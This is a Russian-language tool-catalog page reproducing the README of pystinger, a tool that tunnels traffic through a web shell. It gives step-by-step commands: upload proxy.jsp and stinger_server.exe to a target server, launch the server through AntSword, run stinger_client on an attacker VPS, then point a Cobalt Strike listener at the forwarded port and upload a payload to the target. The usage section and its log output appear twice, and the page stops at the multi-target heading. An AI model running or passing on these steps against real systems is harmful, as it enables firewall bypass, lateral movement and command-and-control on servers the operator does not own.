Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
pystinger — Обход брандмауэра для перенаправления трафика с использованием веб-шелла | Kitploit
Инструменты/GitHubGitHub/funnywolf/pystinger
Фреймворки для эксплойтовГенерация полезной нагрузкиОбход IDS/IPSЛатеральное перемещениеЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed Teaming
GitHubfunnywolf/pystinger

pystinger

Обход брандмауэра для перенаправления трафика с использованием веб-шелла

Репозиторий
1.4k204185 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

pystinger

English | 简体中文

Pystinger реализует SOCK4-прокси и проброс портов через веб-шелл.

Может напрямую использоваться с metasploit-framework, viper, cobalt strike для подключения сессий.

Pystinger разработан на Python и в настоящее время поддерживает три прокси-скрипта: php, jsp(x) и aspx.

Использование

Предположим, доменное имя сервера — http://example.com:8080. Внутренний IP-адрес сервера — 192.168.3.11

SOCK4-прокси

  • Загрузите proxy.jsp на целевой сервер и убедитесь, что http://example.com:8080/proxy.jsp доступен, страница возвращает UTF-8
  • Загрузите stinger_server.exe на целевой сервер, в AntSword выполните cmdstart D:/XXX/stinger_server.exe для запуска pystinger-server

Не запускайте D:/xxx/singer_server.exe напрямую, это приведет к разрыву TCP-соединения

  • Запустите ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 на вашем VPS
  • Вы увидите следующий вывод:
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
  • Теперь у вас запущен socks4a-прокси на VPS 127.0.0.1:60000 для внутренней сети example.com.
  • Теперь целевой сервер (example.com) 127.0.0.1:60020 проброшен на VPS 127.0.0.1:60020.

Подключение beacon в cobaltstrike для одной цели

  • Загрузите proxy.jsp на целевой сервер и убедитесь, что http://example.com:8080/proxy.jsp доступен, страница возвращает UTF-8
  • Загрузите stinger_server.exe на целевой сервер, в AntSword выполните cmdstart D:/XXX/stinger_server.exe для запуска pystinger-server

Не запускайте D:/xxx/singer_server.exe напрямую, это приведет к разрыву TCP-соединения

  • Запустите ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 на вашем VPS
  • Вы увидите следующий вывод:
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
  • Добавьте слушатель в cobaltstrike, порт слушателя — 60020 (порт Handler/LISTEN из RAT CONFIG вывода), адрес слушателя — 127.0.0.1.
  • Сгенерируйте полезную нагрузку, загрузите на цель и запустите.

Подключение beacon в cobaltstrike для нескольких целей

Скачать инструмент